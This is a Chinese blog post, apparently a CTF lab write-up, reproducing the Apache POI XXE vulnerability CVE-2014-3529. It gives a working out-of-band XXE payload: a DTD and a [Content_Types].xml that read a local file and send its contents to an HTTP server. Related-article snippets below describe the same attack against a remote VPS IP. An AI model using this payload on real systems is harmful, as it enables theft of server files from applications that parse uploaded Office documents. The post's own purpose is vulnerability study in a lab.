[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

最新推荐文章于 2024-07-29 10:21:20 发布
最新推荐文章于 2024-07-29 10:21:20 发布
阅读量2k 收藏 11
点赞数 43
分类专栏: 漏洞复现 春秋云境靶场 文章标签: web安全 apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/k5664524/article/details/135627802
版权

一、漏洞情况分析

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

二、漏洞复现

春秋云境.com

进入靶场

准备文件和环境

创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改

###xxe.dtd###

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/%file;'>">
%all;

###[Content_Types].xml###
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>

[Content_Types].xml文件压缩成zip包,名字任意

 使用python开启一个web服务

 开始复现

三、漏洞处置建议 

难受三天,今天睡个好觉。把靶场关了,跟漏洞说“白白吧”

[20][03][06] Apache POI 安全漏洞(CVE-2019-12415)
安全新司机
12-21 7842
文章目录1. 描述2. 场景3. 漏洞复现3.1 引入 apache poi 组件 4.1.0 版本3.2 下载测试用例 excel3.3 制作恶意 excel3.4 测试代码4. 修复方案 1. 描述 Apache POIApache 的一个开源函数库,它提供API给Java程序可对 Excel 进行读和写操作的组件 poi 组件存在以下 CVE 2. 场景 此次要分析的是 CVE-2019-12415 Apache POI 版本 <= 4.1.0 中,当使用 XSSFExportToXml
Apache POI < 4.1.0 XSSFExportToXml XXE漏洞
weixin_42256126的博客
01-20 4010
Apache POI < 4.1.0 XSSFExportToXml XXE漏洞
Apache POI 3.10.1外部实体漏洞CVE-2014-3529
最新发布
qq_23003811的博客
07-29 530
然后到[Content_Types].xml进行压缩为zip文件,得到[Content_Types].zip。最后是重命令[Content_Types].zip为[Content_Types].xlsx。1、修改[Content_Types].xml中的file:///flag达到任意文件读取。1、准备一台vps服务器IP为91.208.73.100,上传xxe.dtd到服务器上。3、制作payload,[Content_Types].xlsx。4、在页面上传[Content_Types].xlsx。
CVE-2014-3529
守拙的博客
02-28 5283
一、 漏洞影响 poi-ooxml3.10及以下 二、环境搭建 1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取 2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.
[漏洞复现]Apache POI3(2),网络安全面试必问
2401_84185471的博客
04-10 396
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**因篇幅有限,仅展示部分资料。
[春秋云镜]CVE-2014-3529
niubi707的博客
11-30 2976
[春秋云镜]CVE-2014-3529 Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
poi-3.10.1jar包
09-12
poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包
poi-3.10.1上传组件jar包 po poi-ooxml poi-ooxml-schemas
10-27
1. poi-3.10.1.jar:这是Apache POI的主要库,包含了处理HSSF(旧版的Excel格式)和XSSF(XML格式的Excel)的核心功能。它提供了API来操作单元格、行、工作表等Excel元素,以及创建新的工作簿、读取现有工作簿、写入...
漏洞复现CVE-2017-12616
Blood_Pupil的博客
03-25 4200
FROM ubuntu apt-get updat&amp;amp;&amp;amp;apt-get install wget&amp;amp;&amp;amp; wget https://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.tar.gz&amp;amp;&amp;amp;tar zxvf apache-tomcat-7.0.75.ta...
Apache POI 安全漏洞
weixin_44778952的博客
11-12 2404
漏洞来源 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1431 漏洞详情 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在代码问题漏洞。攻击者可借助特制的文档利用该漏洞读取本地文件系统中或网络资源中的文件。 参考资料 来源:lists.apache.org 链接:ht
解决Apache POI 代码问题漏洞时,缺少类的问题 (CTPageMar 等)
Oxye
04-17 3742
目录问题代码漏洞告警寻找高版本解决方案一:根据告警提示替换依赖更新依赖步骤解决方案二:把缺少的类从旧包拷到本地解决方案三:终于找到靠谱的依赖总结 问题 先把问题放这 代码漏洞告警 昨天项目代码被检测到POI高危漏洞 漏洞级别:高危漏洞名称:Apache POI 代码问题漏洞 漏洞介绍 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在安全漏洞。攻击者
POI解析excel的漏洞CVE-2014-3574)
06-02 922
一、概述 最早的时候,java开发人员在操作excel的时候,用的最多的框架应该是poi、jxl。随着office的不断发展,office2007开始支持openXML的协议,后续陆续出现了新的框架支持操作office,如docx4j等。openXML使得数据的结构、组成更加透明,可...
Poi HSSFCellStyle.ALIGN_CENTER VERTICAL_CENTER 等爆红的解决办法
Tongyao
05-31 3827
Apache POI是画excel工具,大家在接收旧代码时会出现以下问题: HSSFCellStyle.ALIGN_CENTER HSSFCellStyle.VERTICAL_CENTER 等爆红 原因是版本出错: <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>4.1.2<
大华智慧园区poi任意文件上传漏洞(企业及时修复)
2301_80127209的博客
04-09 465
还是老规矩,fofa先上fofa指纹:body=”/WPMS/asset/lib/gridster/“主站页面如下上pocPOC文字版传了马以后直接访问文字路径:/upload/马子.jsp。
Apache2-XXE漏洞渗透
一纸荒芜的博客
07-04 5110
Apache2 Ubuntu Default Page XXE漏洞渗透
CVE-2014-3529-xxe任意文件读取
qq_30890029的博客
04-21 352
Content_Types].xml通过压缩工具压缩成[Content_Types].zip。将[Content_Types].zip命名为xxe.xlsx。vps开启服务 /在目录下放置一个xxe.dtd文件。命名:[Content_Types].xml。编写一个payload。4:查看log响应日志。
web漏洞XXE
Bin的博客
03-23 779
目录 一、概述 1.1什么是XXE1.2常见位置 二、漏洞验证 三、攻击方法 3.1文件读取 3.1.1攻击代码 3.1.2攻击效果 3.2主机探测 3.2.1攻击代码 3.2.2攻击效果 3.3端口探测 3.3.1攻击代码 3.3.2攻击效果(这里我们加入了端口号,和之前主机发现不同) 3.3代码执行 3.4攻击内网 3.5DDOS攻击 四、防御方法 4...
(8) 如何用Apache POI操作Excel文件-----POI-3.10.1 的一个黑白颜色颠倒的bug以及解决方案
超越梦想,一起飞!!!
06-01 2972
在用POI-3.10的版本设置Excel单元格的字体的颜色或者单元格背景色的时候,对于XSSF方式,如果设置的颜色为黑色,则实际在Excel中渲染出来的却是白色;反之,如果设置的颜色为白色,则实际在Excel中渲染出来的却是黑色。
Apache POI-Excel入门与实战
Alphamilk的博客
07-22 2250
Apache POI是一个流行的Java库,用于读写Microsoft Office格式的文件,如Excel、Word和PowerPoint,无需依赖Office软件。
Apache poipoi-ooxml-schemas包分享
资源摘要信息:"Apache POI中的poi-ooxml-schemas是用于处理Microsoft Office文件格式的Java库的一部分,尤其针对OOXML格式,即Office Open XML。Apache POI项目提供了丰富的API,用于读取和写入Microsoft Office文档...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值